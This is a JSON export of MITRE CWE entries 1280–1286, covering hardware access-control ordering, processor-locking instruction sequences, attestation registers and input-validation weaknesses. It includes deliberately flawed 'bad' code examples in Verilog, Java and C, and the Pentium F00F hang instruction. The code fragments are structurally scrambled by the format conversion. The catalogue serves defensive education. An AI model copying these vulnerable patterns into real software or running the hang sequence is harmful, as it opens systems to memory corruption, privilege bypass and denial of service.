compromised."},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"696","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"Verilog","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"VHDL","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}],"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Access Control","Confidentiality","Integrity"],"Impact":["Modify Memory","Read Memory","Modify Application Data","Read Application Data","Gain Privileges or Assume Identity","Bypass Protection Mechanism"]}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Implement the access control check first. Access should only be given to asset if agent is authorized."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Assume that the module foo_bar implements a protected register. The register content is the asset. Only transactions made by user id (indicated by signal usr_id) 0x4 are allowed to modify the register contents. The signal grant_access is used to provide access.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Verilog"},"xhtml:div":{"#text":"module foo_bar(data_out, usr_id, data_in, clk, rst_n);endmodule","xhtml:p":["output reg [7:0] data_out;;","input wire [2:0] usr_id;","input wire [7:0] data_in;","input wire clk, rst_n;","wire grant_access;","always @ (posedge clk or negedge rst_n)","begin"],"xhtml:div":{"#text":"if (!rst_n)elseend","attr":{"@_style":"margin-left:10px"},"xhtml:br":"","xhtml:div":[{"#text":"data_out = 0;","attr":{"@_style":"margin-left:10px"}},{"#text":"data_out = (grant_access) ? data_in : data_out;assign grant_access = (usr_id == 3\u2019h4) ? 1\u2019b1 : 1\u2019b0;","attr":{"@_style":"margin-left:10px"},"xhtml:br":""}]}}},{"attr":{"@_Nature":"good","@_Language":"Verilog"},"xhtml:p":"Flipping the order of the assignment of data_out and grant_access should solve the problem. The correct snippet of code is shown below.","xhtml:div":["always @ (posedge clk or negedge rst_n)","begin",{"#text":"if (!rst_n)elseend","attr":{"@_style":"margin-left:10px"},"xhtml:div":[{"#text":"data_out = 0;","attr":{"@_style":"margin-left:10px"}},{"#text":"assign grant_access = (usr_id == 3\u2019h4) ? 1\u2019b1 : 1\u2019b0;data_out = (grant_access) ? data_in : data_out;","attr":{"@_style":"margin-left:10px"},"xhtml:br":""}]},"endmodule"]}],"Body_Text":"This code uses Verilog blocking assignments for data_out and grant_access. Therefore, these assignments happen sequentially (i.e., data_out is updated to new value first, and grant_access is updated the next cycle) and not in parallel. Therefore, the asset data_out is allowed to be modified even before the access control check is complete and grant_access signal is set. Since grant_access does not have a reset value, it will be meta-stable and will randomly go to either 0 or 1."}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"180"}}},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-02-12"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Description, Related_Attack_Patterns"}}},"1281":{"attr":{"@_ID":"1281","@_Name":"Sequence of Processor Instructions Leads to Unexpected Behavior","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Specific combinations of processor instructions lead to undesirable behavior such as locking the processor until a hard reset performed.","Extended_Description":{"xhtml:p":["If the instruction set architecture (ISA) and processor logic are not designed carefully, and tested thoroughly, certain combinations of instructions may lead to locking the processor or other unexpected and undesirable behavior. Upon encountering unimplemented instruction opcodes or illegal instruction operands the processor should throw an exception and carry on without negatively impacting security. However, specific combinations of legal and illegal instructions may cause unexpected behavior with security implications such as allowing unprivileged programs to completely lock the CPU.","Some examples are the Pentium f00f bug, MC6800 HCF, the Cyrix comma bug, and more generally other \\"Halt and Catch Fire\\" instructions."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"691","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"Unexpected behavior from certain instruction combinations can arise from bugs in the ISA"},{"Phase":"Implementation","Note":"Unexpected behavior from certain instruction combinations can arise because of implementation details such as speculative execution, caching etc."}]},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Availability"],"Impact":"Varies by Context"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Testing","Description":"Implement a rigorous testing strategy that incorporates randomization to explore instruction sequences that are unlikely to appear in normal workloads in order to identify halt and catch fire instruction sequences."},{"Phase":"Patching and Maintenance","Description":"Patch operating system to avoid running Halt and Catch Fire type sequences or to mitigate the damage caused by unexpected behavior. See [REF-1108]."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The Pentium F00F bug is a real-world example of how a sequence of instructions can lock a processor. The \u201ccmpxchg8b\u201d instruction compares contents of registers with a memory location. The operand is expected to be a memory location, but in the bad code snippet it is the eax register. Because the specified operand is illegal, an exception is generated, which is the correct behavior and not a security issue in itself. However, when prefixed with the \u201clock\u201d instruction, the processor deadlocks because locked memory transactions require a read and write pair of transactions to occur before the lock on the memory bus is released. The exception causes a read to occur but there is no corresponding write, as there would have been if a legal operand had been supplied to the cmpxchg8b instruction.","Example_Code":{"#text":"lock cmpxchg8b eax","attr":{"@_Nature":"bad","@_Language":"Other"}}}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-1999-1476","Description":"A bug in some Intel Pentium processors allow DoS (hang) via an invalid \\"CMPXCHG8B\\" instruction, causing a deadlock","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1476"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"212"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1094"}},{"attr":{"@_External_Reference_ID":"REF-1108"}}]},"Content_History":{"Submission":{"Submission_Name":"Nicole Fern","Submission_Organization":"Tortuga Logic","Submission_Date":"2020-05-15"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Name, Observed_Examples"}],"Previous_Entry_Name":{"#text":"Sequence of Processor Instructions Leads to Unexpected Behavior (Halt and Catch Fire)","attr":{"@_Date":"2021-07-20"}}}},"1282":{"attr":{"@_ID":"1282","@_Name":"Assumed-Immutable Data is Stored in Writable Memory","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Immutable data, such as a first-stage bootloader, device identifiers, and \\"write-once\\" configuration settings are stored in writable memory that can be re-programmed or updated in the field.","Extended_Description":{"xhtml:p":"Security services such as secure boot, authentication of code and data, and device attestation all require assets such as the first stage bootloader, public keys, golden hash digests, etc. which are implicitly trusted. Storing these assets in read-only memory (ROM), fuses, or one-time programmable (OTP) memory provides strong integrity guarantees and provides a root of trust for securing the rest of the system. Security is lost if assets assumed to be immutable can be modified."},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"668","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"471","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"Keys, code, configuration settings, and other data should be programmed in write-once or read-only memory instead of writable memory."}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Varies by Context"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"All immutable code or data should be programmed into ROM or write-once memory."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Cryptographic hash functions are commonly used to create unique fixed-length digests used to ensure the integrity of code and keys. A golden digest is stored on the device and compared to the digest computed from the data to be verified. If the digests match, the data has not been maliciously modified. If an attacker can modify the golden digest they then have the ability to store arbitrary data that passes the verification check. Hash digests used to verify public keys and early stage boot code should be immutable, with the strongest protection offered by hardware immutability."}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"1"}},{"attr":{"@_CAPEC_ID":"180"}}]},"Notes":{"Note":[{"#text":"This entry is still under development and will continue to\\n see updates and content improvements.","attr":{"@_Type":"Maintenance"}},{"#text":"As of CWE 4.3, CWE-1282 and CWE-1233 are being investigated\\n\\t\\t for potential duplication or overlap.","attr":{"@_Type":"Maintenance"}}]},"Content_History":{"Submission":{"Submission_Name":"Nicole Fern","Submission_Organization":"Tortuga Logic","Submission_Date":"2020-05-15"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Demonstrative_Examples, Description, Modes_of_Introduction, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Maintenance_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Related_Attack_Patterns"}],"Previous_Entry_Name":{"#text":"Assumed-Immutable Data Stored in Writable Memory","attr":{"@_Date":"2020-08-20"}}}},"1283":{"attr":{"@_ID":"1283","@_Name":"Mutable Attestation or Measurement Reporting Data","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The register contents used for attestation or measurement reporting data to verify boot flow are modifiable by an adversary.","Extended_Description":{"xhtml:p":"A System-on-Chip (SoC) implements secure boot or verified boot. During this boot flow, the SoC often measures the code that it authenticates. The measurement is usually done by calculating the one-way hash of the code binary and extending it to the previous hash. The hashing algorithm should be a Secure One-Way hash function. The final hash, i.e., the value obtained after the completion of the boot flow, serves as the measurement data used in reporting or in attestation. The calculated hash is often stored in registers that can later be read by the party of interest to determine tampering of the boot flow. A common weakness is that the contents in these registers are modifiable by an adversary, thus spoofing the measurement."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"Such issues can be introduced during hardware architecture or design and can be identified later during Testing or System Configuration phases."},{"Phase":"Implementation","Note":"If the access-controls which protecting the reporting registers are misconfigured during implementation, this weakness can arise."}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":["Read Memory","Read Application Data"]}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":{"xhtml:p":"Measurement data should be stored in registers that are read-only or otherwise have access controls that prevent modification by an untrusted agent."}}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The SoC extends the hash and stores the results in registers. Without protection, an adversary can write their chosen hash values to these registers. Thus, the attacker controls the reported results.","Body_Text":{"xhtml:p":"To prevent the above scenario, the registers should have one or more of the following properties:","xhtml:ol":{"xhtml:li":["Should be Read-Only with respect to an adversary","Cannot be extended or modifiable either directly or indirectly (using a trusted agent as proxy) by an adversary","Should have appropriate access controls or protections"]}}}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"1"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1107"}},{"attr":{"@_External_Reference_ID":"REF-1131"}}]},"Notes":{"Note":{"#text":"This entry is still in development and will continue to see updates and content improvements.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-04-25"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated References, Related_Attack_Patterns"}}},"1284":{"attr":{"@_ID":"1284","@_Name":"Improper Validation of Specified Quantity in Input","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product receives input that is expected to specify a quantity (such as size or length), but it does not validate or incorrectly validates that the quantity has the required properties.","Extended_Description":{"xhtml:p":"Specified quantities include size, length, frequency, price, rate, number of operations, time, and others. Code may rely on specified quantities to allocate resources, perform calculations, control iteration, etc. When the quantity is not properly validated, then attackers can specify malicious quantities to cause excessive resource allocation, trigger unexpected failures, enable buffer overflows, etc."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"20","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Often"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Varies by Context","Note":"Since quantities are used so often to affect resource allocation or process financial data, they are often present in many places in the code."}},"Potential_Mitigations":{"Mitigation":{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]},"Effectiveness":"High"}},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-135"},"Intro_Text":"This example demonstrates a shopping interaction in which the user is free to specify the quantity of items to be purchased and a total is calculated.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"...public static final double price = 20.00;int quantity = currentUser.getAttribute(\\"quantity\\");double total = price * quantity;chargeUser(total);...","xhtml:br":["","","","",""]}},"Body_Text":"The user has no control over the price variable, however the code does not prevent a negative value from being specified for quantity. If an attacker were to provide a negative value, then the user would have their account credited instead of debited."},{"attr":{"@_Demonstrative_Example_ID":"DX-136"},"Intro_Text":"This example asks the user for a height and width of an m X n game board with a maximum dimension of 100 squares.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"...#define MAX_DIM 100...int m,n, error;board_square_t *board;printf(\\"Please specify the board height: \\\\n\\");error = scanf(\\"%d\\", &m);if ( EOF == error ){}printf(\\"Please specify the board width: \\\\n\\");error = scanf(\\"%d\\", &n);if ( EOF == error ){}if ( m > MAX_DIM || n > MAX_DIM ) {}board = (board_square_t*) malloc( m * n * sizeof(board_square_t));...","xhtml:br":["","","","","","","","","","","","","","",""],"xhtml:i":"/* board dimensions */","xhtml:div":[{"#text":"die(\\"No integer passed: Die evil hacker!\\\\n\\");","attr":{"@_style":"margin-left:10px;"}},{"#text":"die(\\"No integer passed: Die evil hacker!\\\\n\\");","attr":{"@_style":"margin-left:10px;"}},{"#text":"die(\\"Value too large: Die evil hacker!\\\\n\\");","attr":{"@_style":"margin-left:10px;"}}]}},"Body_Text":"While this code checks to make sure the user cannot specify large, positive integers and consume too much memory, it does not check for negative values supplied by the user. As a result, an attacker can perform a resource consumption (CWE-400) attack against this program by specifying two, large negative values that will not overflow, resulting in a very large memory allocation (CWE-789) and possibly a system crash. Alternatively, an attacker can provide very large negative values which will cause an integer overflow (CWE-190) and unexpected behavior will follow depending on how the values are treated in the remainder of the program."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2008-1440","Description":"lack of validation of length field leads to infinite loop","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1440"},{"Reference":"CVE-2008-2374","Description":"lack of validation of string length fields allows memory consumption or buffer over-read","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2374"}]},"Notes":{"Note":{"#text":"This entry is still under development and will continue to see updates and content improvements.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2020-06-24"}}},"1285":{"attr":{"@_ID":"1285","@_Name":"Improper Validation of Specified Index, Position, or Offset in Input","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product receives input that is expected to specify an index, position, or offset into an indexable resource such as a buffer or file, but it does not validate or incorrectly validates that the specified index/position/offset has the required properties.","Extended_Description":{"xhtml:p":"Often, indexable resources such as memory buffers or files can be accessed using a specific position, index, or offset, such as an index for an array or a position for a file. When untrusted input is not properly validated before it is used as an index, attackers could access (or attempt to access) unauthorized portions of these resources. This could be used to cause buffer overflows, excessive resource allocation, or trigger unexpected failures."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"20","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Often"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Varies by Context"}},"Potential_Mitigations":{"Mitigation":{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]},"Effectiveness":"High"}},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-134"},"Intro_Text":"The following example retrieves the sizes of messages for a pop3 mail server. The message sizes are retrieved from a socket that returns in a buffer the message number and the message size, the message number (num) and size (size) are extracted from the buffer and the message size is placed into an array using the message number for the array index.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int getsizes(int sock, int count, int *sizes) {}","xhtml:br":["",""],"xhtml:i":"/* capture the sizes of all messages */","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...char buf[BUFFER_SIZE];int ok;int num, size;while ((ok = gen_recv(sock, buf, sizeof(buf))) == 0){}","xhtml:br":["","","","","","",""],"xhtml:i":"// read values from socket and added to sizes array","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (DOTLINE(buf))else if (sscanf(buf, \\"%d %d\\", &num, &size) == 2)","xhtml:br":["","",""],"xhtml:i":"// continue read from socket until buf only contains \'.\'","xhtml:div":[{"#text":"break;","attr":{"@_style":"margin-left:10px;"}},{"#text":"sizes[num - 1] = size;","attr":{"@_style":"margin-left:10px;"}}]}},{"#text":"...","attr":{"@_style":"margin-left:10px;"}}]}}}},{"attr":{"@_Nature":"good","@_Language":"C"},"xhtml:div":{"#text":"int getsizes(int sock, int count, int *sizes) {}","xhtml:br":["",""],"xhtml:i":"/* capture the sizes of all messages */","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...char buf[BUFFER_SIZE];int ok;int num, size;while ((ok = gen_recv(sock, buf, sizeof(buf))) == 0){}","xhtml:br":["","","","","","",""],"xhtml:i":"// read values from socket and added to sizes array","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (DOTLINE(buf))else if (sscanf(buf, \\"%d %d\\", &num, &size) == 2) {}","xhtml:br":["","",""],"xhtml:i":"// continue read from socket until buf only contains \'.\'","xhtml:div":[{"#text":"break;","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (num > 0 && num <= (unsigned)count)else","xhtml:div":[{"#text":"sizes[num - 1] = size;","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"report(stderr, \\"Warning: ignoring bogus data for message sizes returned by server.\\\\n\\");","xhtml:br":["",""],"xhtml:i":"/* warn about possible attempt to induce buffer overflow */"}}],"xhtml:br":""}}]}},{"#text":"...","attr":{"@_style":"margin-left:10px;"}}]}}}}],"Body_Text":"In this example the message number retrieved from the buffer could be a value that is outside the allowable range of indices for the array and could possibly be a negative number. Without proper validation of the value to be used for the array index an array overflow could occur and could potentially lead to unauthorized access to memory addresses and system crashes. The value of the array index should be validated to ensure that it is within the allowable range of indices for the array as in the following code."},{"attr":{"@_Demonstrative_Example_ID":"DX-133"},"Intro_Text":"In the following example the method displayProductSummary is called from a Web service servlet to retrieve product summary information for display to the user. The servlet obtains the integer value of the product number from the user and passes it to the displayProductSummary method. The displayProductSummary method passes the integer value of the product number to the getProductSummary method which obtains the product summary from the array object containing the project summaries using the integer value of the product number as the array index.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public String displayProductSummary(int index) {}public String getProductSummary(int index) {}","xhtml:br":["","","","",""],"xhtml:i":"// Method called from servlet to obtain product information","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"String productSummary = new String(\\"\\");try {} catch (Exception ex) {...}return productSummary;","xhtml:br":["","","","","",""],"xhtml:div":{"#text":"String productSummary = getProductSummary(index);","attr":{"@_style":"margin-left:10px;"}}}},{"#text":"return products[index];","attr":{"@_style":"margin-left:10px;"}}]}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"public String displayProductSummary(int index) {}public String getProductSummary(int index) {}","xhtml:br":["","","","",""],"xhtml:i":"// Method called from servlet to obtain product information","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"String productSummary = new String(\\"\\");try {} catch (Exception ex) {...}return productSummary;","xhtml:br":["","","","","",""],"xhtml:div":{"#text":"String productSummary = getProductSummary(index);","attr":{"@_style":"margin-left:10px;"}}}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"String productSummary = \\"\\";if ((index >= 0) && (index < MAX_PRODUCTS)) {}else {}return productSummary;","xhtml:br":["","","","",""],"xhtml:div":[{"#text":"productSummary = products[index];","attr":{"@_style":"margin-left:10px;"}},{"#text":"System.err.println(\\"index is out of bounds\\");throw new IndexOutOfBoundsException();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}]}}]}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"ArrayList productArray = new ArrayList(MAX_PRODUCTS);...try {} catch (IndexOutOfBoundsException ex) {...}","xhtml:br":["",""],"xhtml:div":{"#text":"productSummary = (String) productArray.get(index);","attr":{"@_style":"margin-left:10px;"}}}}],"Body_Text":["In this example the integer value used as the array index that is provided by the user may be outside the allowable range of indices for the array which may provide unexpected results or cause the application to fail. The integer value used for the array index should be validated to ensure that it is within the allowable range of indices for the array as in the following code.","An alternative in Java would be to use one of the collection objects such as ArrayList that will automatically generate an exception if an attempt is made to access an array index that is out of bounds."]},{"attr":{"@_Demonstrative_Example_ID":"DX-90"},"Intro_Text":"The following example asks a user for an offset into an array to select an item.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int main (int argc, char **argv) {}","xhtml:br":"","xhtml:div":{"#text":"char *items[] = {\\"boat\\", \\"car\\", \\"truck\\", \\"train\\"};int index = GetUntrustedOffset();printf(\\"User selected %s\\\\n\\", items[index-1]);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}},"Body_Text":"The programmer allows the user to specify which element in the list to select, however an attacker can provide an out-of-bounds offset, resulting in a buffer over-read (CWE-126)."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2005-0369","Description":"large ID in packet used as array index","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0369"},{"Reference":"CVE-2001-1009","Description":"negative array index as argument to POP LIST command","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1009"}]},"Notes":{"Note":{"#text":"This entry is still under development and will continue to see updates and content improvements.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2020-06-24"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}}},"1286":{"attr":{"@_ID":"1286","@_Name":"Improper Validation of Syntactic Correctness of Input","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product receives input that is expected to be well-formed - i.e., to comply with a certain syntax - but it does not validate or incorrectly validates that the input complies with the syntax.","Extended_Description":{"xhtml:p":"Often, complex inputs are expected to follow a particular syntax, which is either assumed by the input itself, or declared within metadata such as headers. The syntax could be for data exchange formats, markup languages, or even programming languages. When untrusted input is not properly validated for the expected syntax, attackers could cause parsing failures, trigger unexpected errors, or expose latent vulnerabilities that might not be directly exploitable if the input had conformed to the syntax."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"20","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Often"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Varies by Context"}},"Potential_Mitigations":{"Mitigation":{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]},"Effectiveness":"High"}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following code loads and parses an XML file.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"try {} catch(Exception ex) {}","xhtml:br":["",""],"xhtml:i":"// Read DOM","xhtml:div":[{"#text":"...DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();factory.setValidating( false );....c_dom = factory.newDocumentBuilder().parse( xmlFile );","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""]},{"#text":"...","attr":{"@_style":"margin-left:10px;"}}]}},"Body_Text":"The XML file is loaded without validating it against a known XML Schema or DTD."}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2007-5893","Description":"HTTP request with missing protocol version number leads to crash","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5893"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"66"}}},"Notes":{"Note":{"#text":"This entry is still under development and will continue to see updates and content improvements.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content 